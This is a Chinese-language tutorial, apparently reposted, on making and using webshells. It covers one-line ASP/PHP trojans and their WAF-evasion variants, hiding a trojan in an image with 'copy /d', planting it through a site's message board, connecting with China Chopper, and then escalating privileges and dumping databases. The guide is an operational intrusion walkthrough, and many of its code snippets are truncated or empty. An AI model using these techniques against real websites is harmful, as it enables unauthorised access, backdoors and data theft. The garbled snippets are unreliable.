一、webshell制作原理
1、webshell种类
一句话木马(使用的最多)、小马、大马、打包马、脱裤马等等
2、一句话木马
介绍:短小精悍,并且功能强大、隐蔽性非常好,在入侵种始终扮演着非常重要的角色
eg:<%execute request>
解释:
execute:是一个执行函数,用来执行该命令
request:是接收提交方式,可接受post型、get型、cookie型的传参
value:是参数,也是我们用菜刀连接时的密码
http://www.xx.com/x.aspalue= 以这种方式接收命令
常见写法:
asp一句话:
<%eval request>
PHP一句话:
aspx一句话:
<%@ page language="“Jscript”%">
<%eval>
jsp一句话:(也是一种小马)
一句话木马的变形(为了绕过waf)
这个语句中没有执行函数,只有两个接收函数,使用的时候对参数a传递执行函数 /x.php=eval 然后再用菜刀连接
<%eval>
用ascii码转码,不再使用单引号、双引号,防止闭合
<%eval>
用ascii码转码,不再使用单引号、双引号,防止闭合(asp用+号连接,php用.号连接)
<%a><%eval a%>
一句话图片马制作(隐写,建议使用搭建网站的素材图片)
c32或winhex做一句话
用该软件打开图片,讲一句话代码放在最后面保存
cmd下做一句话
copy /d 1.jpg+1.asp 2.jpg 不建议
也可以在图片属性中的详细信息中添加一句话(版权中)
常见的一句话客户端
一句话客户端增强版
中国菜刀 右后门 菜刀上传大马1,再删除菜刀码,大马1上传大马2,删除大马1,要脱三次
中国砍刀
lanker一句话客户端
zv新型PHP一句话客户端GUI版
3、小马
体积小,易隐蔽,最重要的是与图片结合在一起上传后可以利用nginx或者iis6的解析漏洞来运行,不过功能少,一般只用来上传大马
4、大马
体积大,50K大小左右,功能多,一般包括提权命令,磁盘管理,数据库连接接口,执行命令甚至有些具备自带的提权功能和压缩,解压缩网站程序功能,隐蔽性不好,而且大多数代码不加密或被查杀。
二、使用技巧
1、一句话的使用
首先,找到数据库是asp格式的网站,然后,以留言板或者发表文章的方式,把一句话添加到数据库,或者网页。我们的目的是把一句话添加到数据库,无论任何方式。然后菜刀连接。
2、小马使用:
主要用来上传大马
3、大马使用:
提权、打包、脱裤、增删文件等等
4、使用技巧
内容编码、配合解析漏洞、配合文件包含、利用文件名溢出
文件包含代码,放在b.asp
conn.asp 就是要包含的文件
使用的时候直接访问b.asp,就会加载conn.asp文件
三、webshell“黑吃黑”
找shell后门
查找后门、查找webshell后门、找到后门地址、返搞webshell箱子
来源:Mr. Sun_
声明:本站部分文章及图片转载于互联网,内容版权归原作者所有,如本站任何资料有侵权请您尽早请联系jinwei@zod.com.cn进行处理,非常感谢!